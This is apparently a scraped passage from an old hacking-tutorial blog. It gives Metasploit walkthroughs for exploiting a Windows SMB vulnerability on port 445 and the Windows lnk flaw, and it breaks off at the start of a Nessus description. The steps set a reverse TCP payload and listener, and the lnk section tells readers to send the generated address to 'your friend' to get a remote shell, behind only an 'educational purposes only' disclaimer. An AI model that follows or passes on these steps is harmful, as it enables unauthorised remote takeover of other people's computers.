<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4LIZrZ-JPW3TmA3Z_yVqCunDF3GsG0PIBL5X51cMOsYxxhDpcj7C2wS9y00LBNv4YfjPLhsMgAXzTmsofgLPr7TrOVWPoN-9WwGpjBUwvP4yWeLGbDTNDfS160G_9wp1WHYnTAUx6hX0/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4LIZrZ-JPW3TmA3Z_yVqCunDF3GsG0PIBL5X51cMOsYxxhDpcj7C2wS9y00LBNv4YfjPLhsMgAXzTmsofgLPr7TrOVWPoN-9WwGpjBUwvP4yWeLGbDTNDfS160G_9wp1WHYnTAUx6hX0/s640/11.png" width="640" /></a></div>
<div class="MsoNormal" style="margin-left: -63.0pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: -1.0in;">
<b><u><br /></u></b></div>
<div class="MsoNormal">
<b><u>TESTING WITH
FRAMEWORK:<o:p></o:p></u></b></div>
<div class="MsoNormal">
<b><u>Ex:<o:p></o:p></u></b></div>
<div class="MsoNormal">
Go to the Metasploit framework.</div>
<div class="MsoNormal">
I’ve chosen port 445 since it has a high number of vulnerabilities.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoYMZPi9Ws0YMzaE960rjJVAatnChfDYeP4qDYqtCddlJbGFe0WjJZy618-qoeyEr5dvz406ux5CM2c4TMiqK0w7z5gJK7b_l8IPLjpQaHNQl4DgCKlnOKkWm1c6FZt43KUrN6ZI5_lD8/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoYMZPi9Ws0YMzaE960rjJVAatnChfDYeP4qDYqtCddlJbGFe0WjJZy618-qoeyEr5dvz406ux5CM2c4TMiqK0w7z5gJK7b_l8IPLjpQaHNQl4DgCKlnOKkWm1c6FZt43KUrN6ZI5_lD8/s640/12.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal" style="margin-left: -1.0in;">
<br /></div>
<div class="MsoNormal">
Now we choose the vulnerability with ID 19408.</div>
<div class="MsoNormal">
Now we go to the framework and search for the exploit corresponding to the above vulnerability.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC6sZPDjq2mSBUasSnf7-Mg5LA_BXG4QPLqEtKWGkZmb1cn71ZJ0hOhbe3_f_TZdoT-qQJIoPPyjiJE9UYHJsRDtT3479bMhN0hdMzpHtusGX7ZgyFwFclICNF6JPEmMu1QEekqPahE80/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC6sZPDjq2mSBUasSnf7-Mg5LA_BXG4QPLqEtKWGkZmb1cn71ZJ0hOhbe3_f_TZdoT-qQJIoPPyjiJE9UYHJsRDtT3479bMhN0hdMzpHtusGX7ZgyFwFclICNF6JPEmMu1QEekqPahE80/s640/13.png" width="640" /></a></div>
<div class="MsoNormal" style="margin-left: -1.0in;">
<br /></div>
<div class="MsoNormal">
We choose the above exploit:</div>
<div class="MsoNormal">
Ex:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCL8Z9jWUgFXSka_9HTpXyLIOGF3k9k1cEdcBaEneVyPvSAEzBuuVyu_70a7_DYJlflDRZZPwMM7jYVK4C6p86CWBMxnIjjmxCXgwNr_UhYYBI3SKvfdtXGuPxMeIV_B0q_cpPGEKxvb0/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCL8Z9jWUgFXSka_9HTpXyLIOGF3k9k1cEdcBaEneVyPvSAEzBuuVyu_70a7_DYJlflDRZZPwMM7jYVK4C6p86CWBMxnIjjmxCXgwNr_UhYYBI3SKvfdtXGuPxMeIV_B0q_cpPGEKxvb0/s400/14.png" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Now type >show options to see whether the target host is set or not.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<o:p> </o:p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPMT6daFjd91sg_D6hIm9yjS4qgbBXdFvvjMQi7n3OYJ5F_hYCtl_wnGInhh3It_G5zMKiDg8FmVFedTfrZdi2IH8h43yr0G9DEdgmxmEX8dGK4pguAhi_ZYlbjm7H87B2roUw3Lpo92Y/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPMT6daFjd91sg_D6hIm9yjS4qgbBXdFvvjMQi7n3OYJ5F_hYCtl_wnGInhh3It_G5zMKiDg8FmVFedTfrZdi2IH8h43yr0G9DEdgmxmEX8dGK4pguAhi_ZYlbjm7H87B2roUw3Lpo92Y/s640/15.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
As you can see, there is no target set, so now we set the target below:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7xV9xvKHomMYCO2ohplQEWRjYpARZDNBfGyKTALR5t-jQDrMRSIztb2h5QlGx_XpGr5naZeHnpPdoj45r-NbWwhttnSHROBuzayZsFnMCsFVr5ZTZEO1bEM0-Dj9FHtbee208WlEtCDc/s1600/16.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7xV9xvKHomMYCO2ohplQEWRjYpARZDNBfGyKTALR5t-jQDrMRSIztb2h5QlGx_XpGr5naZeHnpPdoj45r-NbWwhttnSHROBuzayZsFnMCsFVr5ZTZEO1bEM0-Dj9FHtbee208WlEtCDc/s400/16.png" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
The target should be set to 0, since the exploit is listed as working against Windows 2***:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgviQzQBsNDsUMNQKv5TyLiXMOAnMp0QYZoZaDXSUsJ1cWwTcm_FgRNxCULQwLDmhdVxwrGSOQpV95GptQ77uwO9Bq5SRuzD5QLfoX3GYxdPdq2-Y0AbK8GB8hUJdI6-VZv6bJ0nHRk9OI/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgviQzQBsNDsUMNQKv5TyLiXMOAnMp0QYZoZaDXSUsJ1cWwTcm_FgRNxCULQwLDmhdVxwrGSOQpV95GptQ77uwO9Bq5SRuzD5QLfoX3GYxdPdq2-Y0AbK8GB8hUJdI6-VZv6bJ0nHRk9OI/s1600/17.png" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZTvaNuhsHkHCWwOzH4aggj8keMpLnUMY_26drVw7VTu7RoAP8UGjgipecY9x1vrt8Pvh68TiAJBFCuW0ELoMi0LYIqIjMWvqH1ODEaTuf9ujHX3VVL87PvhArSUQLTUhW5oBxIDlhDM0/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZTvaNuhsHkHCWwOzH4aggj8keMpLnUMY_26drVw7VTu7RoAP8UGjgipecY9x1vrt8Pvh68TiAJBFCuW0ELoMi0LYIqIjMWvqH1ODEaTuf9ujHX3VVL87PvhArSUQLTUhW5oBxIDlhDM0/s400/18.png" width="400" /></a></div>
<div class="MsoNormal">
---------------------------------------------</div>
<div class="MsoNormal">
Now we select the payload:</div>
<div class="MsoNormal">
To see the available payloads, type:</div>
<div class="MsoNormal">
>show payloads</div>
<div class="MsoNormal">
To set the payload, see below:</div>
<div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0in 0in 1.0pt 0in;">
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in;">
<br /></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikd74VzHU5f6VqPVOk1uKXIivK-3ofdovNzKj-0WNYr8sV9CB0LRjXMtjAf8XSXhg_2oc4Ynvc4-k5fyNGp1gq8Af8HD7-m9Sq0A0xDg20zDi2L51V4q0xbCjgQjtV2bgwcwdbxyH0BF8/s1600/19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikd74VzHU5f6VqPVOk1uKXIivK-3ofdovNzKj-0WNYr8sV9CB0LRjXMtjAf8XSXhg_2oc4Ynvc4-k5fyNGp1gq8Af8HD7-m9Sq0A0xDg20zDi2L51V4q0xbCjgQjtV2bgwcwdbxyH0BF8/s640/19.png" width="640" /></a></div>
</div>
<div class="MsoNormal">
To see whether our local IP or host is set, type:</div>
<div class="MsoNormal">
>show options</div>
<div class="MsoNormal">
You will see this:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0Op3WUjED43cZ6PH3_kYuzdZox3CaCMLaOm_vWu_HFlWfsnx-5Es099QQyEnWA-hHtx3sl9AP0CIIFU7ga2Lp6A9PlG_nclY8b6drHP9ZvsYDRAhgyC_xX7fr94ZfqStmluOTR9S2jfw/s1600/20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0Op3WUjED43cZ6PH3_kYuzdZox3CaCMLaOm_vWu_HFlWfsnx-5Es099QQyEnWA-hHtx3sl9AP0CIIFU7ga2Lp6A9PlG_nclY8b6drHP9ZvsYDRAhgyC_xX7fr94ZfqStmluOTR9S2jfw/s640/20.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
As you can observe, <b>LHOST</b>, which is our local IP, is not set:</div>
<div class="MsoNormal">
To set it, type:</div>
<div class="MsoNormal">
<br /></div>
<div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0in 0in 1.0pt 0in;">
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in;">
><b>set LHOST &lt;host ip&gt;</b></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in;">
<br /></div>
</div>
<div class="MsoNormal">
Now type:</div>
<div class="MsoNormal">
>exploit</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4sbyu2WG9cJvbezxeEFOiGn3SIKfCsS3Vf7YFWNlWJpfeQIrw01avB9il5uj3-zMdgwaaQF56Uq7ovwnryVtgGWqqq1Zo4rbp8gSDFbr3LfwstSwXMmP8lxXTlIsSzsPi4d8UWrLf9iM/s1600/21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4sbyu2WG9cJvbezxeEFOiGn3SIKfCsS3Vf7YFWNlWJpfeQIrw01avB9il5uj3-zMdgwaaQF56Uq7ovwnryVtgGWqqq1Zo4rbp8gSDFbr3LfwstSwXMmP8lxXTlIsSzsPi4d8UWrLf9iM/s640/21.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Hurray!</div>
<div class="MsoNormal">
You will get the target host's command shell.</div>
<div class="MsoNormal">
Enjoy!</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
========================================================================<br />
<br />
<span class="Apple-style-span" style="background-color: #f6f3ef; color: #555555; font-family: Arial, Verdana; font-size: 12px;"></span><br />
<h3 class="post-title entry-title" style="color: #373736; font-family: Arial, Helvetica, sans-serif; font-size: 24px; font-weight: bold; line-height: 24px; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<a href="http://www.pentester.co.in/2011/10/windows-lnk-exploit.html" style="color: #373736; display: block; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;">Windows lnk Exploit</a></h3>
<div class="post-body entry-content" style="font-family: Arial, Verdana; font-size: 12px; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 10px; padding-top: 0px;">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif;">Hack the system using the Windows lnk exploit:</span></u></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Update Metasploit.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Go to the prompt and change into the framework directory.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Then type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">#./msfconsole<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">The msf> prompt opens.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Then search for the Windows lnk exploit.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Msf>search lnk<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">It then shows the exploit:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">exploit/xxxxx/xxxxxr/xxxxx_dllloader<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">then type:</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><o:p></o:p></span></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">msf>use exploitname</span></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"> (type the exploit name shown above)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Set <b>SRVHOST</b>, that is, your local IP, to get the connection back.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Then set payload<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">The shell/reverse_tcp payload works in most cases,<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">so type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">msf>set payload windows/metxxxxx/xxx_tcp<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">then set LHOST to your local IP.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">then type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">msf>exploit<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">You will be shown a URL or address with a port number; give it to your friend.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Tada!<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Wait for the reverse connection.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">---------------------------------------------------</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Warning:</span></u></b></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"> I'm not responsible for your actions; this is for educational purposes only.</span></b></span></div>
</div>
</div>
</div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-64096234478724629562011-10-15T04:07:00.000-07:002011-10-15T04:07:56.068-07:00Nessus<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Nessus</span></b></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">is a</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">proprietary</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">comprehensive
vulnerability scanning program. It is free of charge for personal use in a
non-enterprise environment. Its goal is to detect potential</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">vulnerabilities</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">on the tested
systems.</span><o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 18.0pt; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 4.8pt;">
<span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">For example:<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 18.0pt; margin-bottom: 1.2pt; margin-left: .25in; text-indent: -.25in;">
<span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt;">· Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 18.0pt; margin-bottom: 1.2pt; margin-left: .25in; text-indent: -.25in;">
